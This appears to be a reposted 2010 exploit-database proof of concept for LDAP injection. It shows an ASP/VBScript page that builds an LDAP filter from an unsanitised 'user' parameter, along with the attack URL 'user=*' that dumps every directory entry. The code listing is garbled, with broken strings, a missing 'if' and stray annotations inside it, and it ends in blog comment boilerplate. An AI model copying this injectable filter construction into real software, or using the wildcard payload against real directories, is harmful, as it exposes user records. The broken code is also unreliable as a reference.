LDAP Injection

# Title: LDAP Injection POC
# EDB-ID: 11364
# CVE-ID: ()
# OSVDB-ID: ()
# Author: mc2_s3lector
# Published: 2010-02-09
# Verified: no
# Download Exploit Code
# Download N/A
http://www.exploit-db.com/exploits/11364
http://inj3ct0r.com/exploits/10800
http://www.vfocus.net/art/20100210/6611.html
http://packetstormsecurity.nl/filedesc/ldap-poc.txt.html

[+] Vurnerebility:  LDAP Injection
[+] Category     :  Implemented Web exploit    
[+] Category     :  Attack Technique
[+] Author       :  mc2_s3lector
[+] dork         :  X/o\"  
[+] Contact  :  www.yogyacarderlink.web.id
[+] date     :  4-2-10
[+] biGthank to  :  Allah SWT,jasakom,KeDai Computerworks,0n3-d4y n3ro,eplaciano, all*.indonesian like a coding,

---------------------------------------------------------------------------------------------------------------------------------------------------
Directory acces protokol/directory manipulation,protokol breaker->standar protocol,query
custom statement,page request,componen execute command,data base server,web apps services
modify,remove etc.
---------------------------------------------------------------------------------------------------------------------------------------------------

code:
<%@ Language=VBScript %>
<%
Dim userName
Dim filter
Dim ldapObj
Const LDAP_SERVER = "ldap.example"
userName = Request.QueryString("user")<-----------*1(LOOK THIS BUG LINE PARAMETER USER=EMPTY)

( userName = "" ) then
Response.Write("Invalid
request. Please specify a
valid user name
")
Response.End()
end if

filter= "(uid=" + CStr(userName) + //((*1))
userName used to initialize filter variable on this line direct query LDAP call to finf filter on ((*.3))
")" ' searching
for the user entry
'Creat LDAP object and setting
the base dn
Set ldapObj =
Server.CreateObject("IPWorksASP.LDAP")
ldapObj.ServerName = LDAP_SERVER
ldapObj.DN =
"ou=people,dc=spilab,dc=com"
'Setting the search filter
ldapObj.SearchFilter = ((*.3))filter<---call SearchFilter on this line
ldapObj.Search
'Showing the user ennumeratin info
While ldapObj.result = ((1*.4 to *.5))
Response.Write("")
Write("User
information for : " +
ldapObj.AttrValue(0) + "
")
For i = 0 To ldapObj.AttrCount -1
Response.Write("" +
ldapObj.AttrType(i) +
" : " + ldapObj.AttrValue(i) + "
" )
Response.Write("")
Wend ((*.5))
%>
---------------------------------------------------------------------------------------------------------------------------------------------------
control over LDAP to querry =server LDAP & get query result from ((*.4 to *.5))

POC:

http://server/ldapsearch.asp?user=* <----send the * character in the parameter user,result flter variable in code to be initialized with
(uid=*). The resulting LDAP statement will make the server return
-------------------------------------------------------------------------------------------------------------------------------------------------




Category Article

3 Responses to “c0decstuff”

What's on Your Mind...

Thank f' u C0mment